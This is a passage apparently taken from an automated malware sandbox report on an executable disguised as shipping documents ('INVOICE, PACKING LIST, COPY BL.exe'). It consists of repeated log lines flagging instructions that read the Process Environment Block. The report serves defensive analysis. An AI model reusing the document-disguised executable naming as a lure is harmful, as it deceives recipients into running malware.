                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640770 mov eax, dword ptr fs:[00000030h]3_2_01640770
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166674D mov esi, dword ptr fs:[00000030h]3_2_0166674D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166674D mov eax, dword ptr fs:[00000030h]3_2_0166674D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166674D mov eax, dword ptr fs:[00000030h]3_2_0166674D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630750 mov eax, dword ptr fs:[00000030h]3_2_01630750
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BE75D mov eax, dword ptr fs:[00000030h]3_2_016BE75D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672750 mov eax, dword ptr fs:[00000030h]3_2_01672750
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672750 mov eax, dword ptr fs:[00000030h]3_2_01672750
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B4755 mov eax, dword ptr fs:[00000030h]3_2_016B4755
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C720 mov eax, dword ptr fs:[00000030h]3_2_0166C720
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C720 mov eax, dword ptr fs:[00000030h]3_2_0166C720
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166273C mov eax, dword ptr fs:[00000030h]3_2_0166273C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166273C mov ecx, dword ptr fs:[00000030h]3_2_0166273C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166273C mov eax, dword ptr fs:[00000030h]3_2_0166273C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AC730 mov eax, dword ptr fs:[00000030h]3_2_016AC730
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C700 mov eax, dword ptr fs:[00000030h]3_2_0166C700
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630710 mov eax, dword ptr fs:[00000030h]3_2_01630710
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01660710 mov eax, dword ptr fs:[00000030h]3_2_01660710
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016527ED mov eax, dword ptr fs:[00000030h]3_2_016527ED
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016527ED mov eax, dword ptr fs:[00000030h]3_2_016527ED
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016527ED mov eax, dword ptr fs:[00000030h]3_2_016527ED
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BE7E1 mov eax, dword ptr fs:[00000030h]3_2_016BE7E1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016347FB mov eax, dword ptr fs:[00000030h]3_2_016347FB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016347FB mov eax, dword ptr fs:[00000030h]3_2_016347FB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163C7C0 mov eax, dword ptr fs:[00000030h]3_2_0163C7C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B07C3 mov eax, dword ptr fs:[00000030h]3_2_016B07C3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016307AF mov eax, dword ptr fs:[00000030h]3_2_016307AF
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E47A0 mov eax, dword ptr fs:[00000030h]3_2_016E47A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D678E mov eax, dword ptr fs:[00000030h]3_2_016D678E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F866E mov eax, dword ptr fs:[00000030h]3_2_016F866E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F866E mov eax, dword ptr fs:[00000030h]3_2_016F866E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A660 mov eax, dword ptr fs:[00000030h]3_2_0166A660
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A660 mov eax, dword ptr fs:[00000030h]3_2_0166A660
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01662674 mov eax, dword ptr fs:[00000030h]3_2_01662674
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164C640 mov eax, dword ptr fs:[00000030h]3_2_0164C640
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164E627 mov eax, dword ptr fs:[00000030h]3_2_0164E627
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01666620 mov eax, dword ptr fs:[00000030h]3_2_01666620
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01668620 mov eax, dword ptr fs:[00000030h]3_2_01668620
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163262C mov eax, dword ptr fs:[00000030h]3_2_0163262C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE609 mov eax, dword ptr fs:[00000030h]3_2_016AE609
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164260B mov eax, dword ptr fs:[00000030h]3_2_0164260B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164260B mov eax, dword ptr fs:[00000030h]3_2_0164260B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164260B mov eax, dword ptr fs:[00000030h]3_2_0164260B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164260B mov eax, dword ptr fs:[00000030h]3_2_0164260B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164260B mov eax, dword ptr fs:[00000030h]3_2_0164260B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164260B mov eax, dword ptr fs:[00000030h]3_2_0164260B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0164260B mov eax, dword ptr fs:[00000030h]3_2_0164260B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01672619 mov eax, dword ptr fs:[00000030h]3_2_01672619
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE6F2 mov eax, dword ptr fs:[00000030h]3_2_016AE6F2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE6F2 mov eax, dword ptr fs:[00000030h]3_2_016AE6F2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE6F2 mov eax, dword ptr fs:[00000030h]3_2_016AE6F2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE6F2 mov eax, dword ptr fs:[00000030h]3_2_016AE6F2
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B06F1 mov eax, dword ptr fs:[00000030h]3_2_016B06F1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B06F1 mov eax, dword ptr fs:[00000030h]3_2_016B06F1
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0166A6C7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A6C7 mov eax, dword ptr fs:[00000030h]3_2_0166A6C7
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C6A6 mov eax, dword ptr fs:[00000030h]3_2_0166C6A6
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016666B0 mov eax, dword ptr fs:[00000030h]3_2_016666B0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01634690 mov eax, dword ptr fs:[00000030h]3_2_01634690
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01634690 mov eax, dword ptr fs:[00000030h]3_2_01634690
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01656962 mov eax, dword ptr fs:[00000030h]3_2_01656962
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01656962 mov eax, dword ptr fs:[00000030h]3_2_01656962
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01656962 mov eax, dword ptr fs:[00000030h]3_2_01656962
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0167096E mov eax, dword ptr fs:[00000030h]3_2_0167096E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0167096E mov edx, dword ptr fs:[00000030h]3_2_0167096E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0167096E mov eax, dword ptr fs:[00000030h]3_2_0167096E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D4978 mov eax, dword ptr fs:[00000030h]3_2_016D4978
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D4978 mov eax, dword ptr fs:[00000030h]3_2_016D4978
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BC97C mov eax, dword ptr fs:[00000030h]3_2_016BC97C
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B0946 mov eax, dword ptr fs:[00000030h]3_2_016B0946
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704940 mov eax, dword ptr fs:[00000030h]3_2_01704940
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B892A mov eax, dword ptr fs:[00000030h]3_2_016B892A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C892B mov eax, dword ptr fs:[00000030h]3_2_016C892B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE908 mov eax, dword ptr fs:[00000030h]3_2_016AE908
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AE908 mov eax, dword ptr fs:[00000030h]3_2_016AE908
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BC912 mov eax, dword ptr fs:[00000030h]3_2_016BC912
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01628918 mov eax, dword ptr fs:[00000030h]3_2_01628918
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01628918 mov eax, dword ptr fs:[00000030h]3_2_01628918
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BE9E0 mov eax, dword ptr fs:[00000030h]3_2_016BE9E0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016629F9 mov eax, dword ptr fs:[00000030h]3_2_016629F9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016629F9 mov eax, dword ptr fs:[00000030h]3_2_016629F9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C69C0 mov eax, dword ptr fs:[00000030h]3_2_016C69C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A9D0 mov eax, dword ptr fs:[00000030h]3_2_0163A9D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A9D0 mov eax, dword ptr fs:[00000030h]3_2_0163A9D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A9D0 mov eax, dword ptr fs:[00000030h]3_2_0163A9D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A9D0 mov eax, dword ptr fs:[00000030h]3_2_0163A9D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A9D0 mov eax, dword ptr fs:[00000030h]3_2_0163A9D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0163A9D0 mov eax, dword ptr fs:[00000030h]3_2_0163A9D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016649D0 mov eax, dword ptr fs:[00000030h]3_2_016649D0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FA9D3 mov eax, dword ptr fs:[00000030h]3_2_016FA9D3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016429A0 mov eax, dword ptr fs:[00000030h]3_2_016429A0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016309AD mov eax, dword ptr fs:[00000030h]3_2_016309AD
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016309AD mov eax, dword ptr fs:[00000030h]3_2_016309AD
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B89B3 mov esi, dword ptr fs:[00000030h]3_2_016B89B3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B89B3 mov eax, dword ptr fs:[00000030h]3_2_016B89B3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016B89B3 mov eax, dword ptr fs:[00000030h]3_2_016B89B3
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BE872 mov eax, dword ptr fs:[00000030h]3_2_016BE872
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BE872 mov eax, dword ptr fs:[00000030h]3_2_016BE872
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C6870 mov eax, dword ptr fs:[00000030h]3_2_016C6870
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C6870 mov eax, dword ptr fs:[00000030h]3_2_016C6870
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01642840 mov ecx, dword ptr fs:[00000030h]3_2_01642840
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01660854 mov eax, dword ptr fs:[00000030h]3_2_01660854
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01634859 mov eax, dword ptr fs:[00000030h]3_2_01634859
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01634859 mov eax, dword ptr fs:[00000030h]3_2_01634859
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01652835 mov eax, dword ptr fs:[00000030h]3_2_01652835
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01652835 mov eax, dword ptr fs:[00000030h]3_2_01652835
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01652835 mov eax, dword ptr fs:[00000030h]3_2_01652835
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01652835 mov ecx, dword ptr fs:[00000030h]3_2_01652835
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01652835 mov eax, dword ptr fs:[00000030h]3_2_01652835
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01652835 mov eax, dword ptr fs:[00000030h]3_2_01652835
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166A830 mov eax, dword ptr fs:[00000030h]3_2_0166A830
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D483A mov eax, dword ptr fs:[00000030h]3_2_016D483A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D483A mov eax, dword ptr fs:[00000030h]3_2_016D483A
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BC810 mov eax, dword ptr fs:[00000030h]3_2_016BC810
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FA8E4 mov eax, dword ptr fs:[00000030h]3_2_016FA8E4
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C8F9 mov eax, dword ptr fs:[00000030h]3_2_0166C8F9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166C8F9 mov eax, dword ptr fs:[00000030h]3_2_0166C8F9
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165E8C0 mov eax, dword ptr fs:[00000030h]3_2_0165E8C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_017008C0 mov eax, dword ptr fs:[00000030h]3_2_017008C0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630887 mov eax, dword ptr fs:[00000030h]3_2_01630887
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BC89D mov eax, dword ptr fs:[00000030h]3_2_016BC89D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0162CB7E mov eax, dword ptr fs:[00000030h]3_2_0162CB7E
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E4B4B mov eax, dword ptr fs:[00000030h]3_2_016E4B4B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E4B4B mov eax, dword ptr fs:[00000030h]3_2_016E4B4B
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01702B57 mov eax, dword ptr fs:[00000030h]3_2_01702B57
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01702B57 mov eax, dword ptr fs:[00000030h]3_2_01702B57
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01702B57 mov eax, dword ptr fs:[00000030h]3_2_01702B57
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01702B57 mov eax, dword ptr fs:[00000030h]3_2_01702B57
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C6B40 mov eax, dword ptr fs:[00000030h]3_2_016C6B40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016C6B40 mov eax, dword ptr fs:[00000030h]3_2_016C6B40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016FAB40 mov eax, dword ptr fs:[00000030h]3_2_016FAB40
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016D8B42 mov eax, dword ptr fs:[00000030h]3_2_016D8B42
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01628B50 mov eax, dword ptr fs:[00000030h]3_2_01628B50
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DEB50 mov eax, dword ptr fs:[00000030h]3_2_016DEB50
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165EB20 mov eax, dword ptr fs:[00000030h]3_2_0165EB20
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165EB20 mov eax, dword ptr fs:[00000030h]3_2_0165EB20
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F8B28 mov eax, dword ptr fs:[00000030h]3_2_016F8B28
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016F8B28 mov eax, dword ptr fs:[00000030h]3_2_016F8B28
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01704B00 mov eax, dword ptr fs:[00000030h]3_2_01704B00
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AEB1D mov eax, dword ptr fs:[00000030h]3_2_016AEB1D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AEB1D mov eax, dword ptr fs:[00000030h]3_2_016AEB1D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AEB1D mov eax, dword ptr fs:[00000030h]3_2_016AEB1D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AEB1D mov eax, dword ptr fs:[00000030h]3_2_016AEB1D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AEB1D mov eax, dword ptr fs:[00000030h]3_2_016AEB1D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AEB1D mov eax, dword ptr fs:[00000030h]3_2_016AEB1D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AEB1D mov eax, dword ptr fs:[00000030h]3_2_016AEB1D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AEB1D mov eax, dword ptr fs:[00000030h]3_2_016AEB1D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016AEB1D mov eax, dword ptr fs:[00000030h]3_2_016AEB1D
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638BF0 mov eax, dword ptr fs:[00000030h]3_2_01638BF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638BF0 mov eax, dword ptr fs:[00000030h]3_2_01638BF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01638BF0 mov eax, dword ptr fs:[00000030h]3_2_01638BF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0165EBFC mov eax, dword ptr fs:[00000030h]3_2_0165EBFC
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016BCBF0 mov eax, dword ptr fs:[00000030h]3_2_016BCBF0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01650BCB mov eax, dword ptr fs:[00000030h]3_2_01650BCB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01650BCB mov eax, dword ptr fs:[00000030h]3_2_01650BCB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01650BCB mov eax, dword ptr fs:[00000030h]3_2_01650BCB
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630BCD mov eax, dword ptr fs:[00000030h]3_2_01630BCD
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630BCD mov eax, dword ptr fs:[00000030h]3_2_01630BCD
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01630BCD mov eax, dword ptr fs:[00000030h]3_2_01630BCD
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016DEBD0 mov eax, dword ptr fs:[00000030h]3_2_016DEBD0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640BBE mov eax, dword ptr fs:[00000030h]3_2_01640BBE
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_01640BBE mov eax, dword ptr fs:[00000030h]3_2_01640BBE
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E4BB0 mov eax, dword ptr fs:[00000030h]3_2_016E4BB0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_016E4BB0 mov eax, dword ptr fs:[00000030h]3_2_016E4BB0
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166CA6F mov eax, dword ptr fs:[00000030h]3_2_0166CA6F
                Source: C:\Users\user\Desktop\INVOICE, PACKING LIST, COPY BL.exeCode function: 3_2_0166CA6F mov eax, dword ptr fs:[00000030h]3_2_0166CA6F
